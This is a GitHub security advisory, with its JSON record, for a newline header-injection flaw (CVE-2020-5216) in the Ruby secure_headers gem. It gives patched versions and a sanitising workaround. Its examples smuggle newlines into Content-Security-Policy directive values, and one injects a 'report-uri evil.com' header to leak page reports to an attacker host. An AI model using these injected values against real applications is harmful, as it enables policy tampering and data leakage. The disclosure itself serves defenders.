ghsa-w978-rmpf-qmwg
Vulnerability from github
Impact
If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.
Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline.
e.g.
ruby
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])`
would result in
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
ruby
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
Patches
This has been fixed in 6.3.0, 5.2.0, and 3.9.0
Workarounds
ruby
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
References
https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c The effect of multiple policies
For more information
If you have any questions or comments about this advisory: * Open an issue in this repo * DM us at @ndm on twitter
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "secure_headers"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.3.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "secure_headers"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.2.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "secure_headers"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-5216"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": true,
"github_reviewed_at": "2020-01-23T02:27:18Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Impact\n\nIf user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.\n\nUpon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline.\n\ne.g.\n\n```ruby\noverride_content_security_directives(script_src: [\u0027mycdn.com\u0027, \"\\ninjected\\n\"])` \n```\n\nwould result in \n\n```\nContent-Security-Policy: ... script-src: mycdn.com\nContent-Security-Policy: injected\nContent-Security-Policy: rest-of-the-header\n```\n\nCSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:\n\n```ruby\noverride_content_security_directives(script_src: [\"mycdn.com\", \"\\ndefault-src \u0027none\u0027; report-uri evil.com\"]) \n```\n```\nContent-Security-Policy: ... script-src: mycdn.com\nContent-Security-Policy: default-src \u0027none\u0027; report-uri evil.com\nContent-Security-Policy: rest-of-the-header\n```\n\n### Patches\n\nThis has been fixed in 6.3.0, 5.2.0, and 3.9.0\n\n### Workarounds\n\n```ruby\noverride_content_security_policy_directives(:frame_src, [user_input.gsub(\"\\n\", \" \")])\n```\n\n### References\n\nhttps://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c\n[The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new)\n* DM us at @ndm on twitter",
"id": "GHSA-w978-rmpf-qmwg",
"modified": "2023-05-16T16:11:19Z",
"published": "2020-01-23T02:27:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5216"
},
{
"type": "WEB",
"url": "https://github.com/twitter/secure_headers/commit/301695706f6a70517c2a90c6ef9b32178440a2d0"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5216.yml"
},
{
"type": "PACKAGE",
"url": "https://github.com/twitter/secure_headers"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Limited header injection when using dynamic overrides with user input in RubyGems secure_headers"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.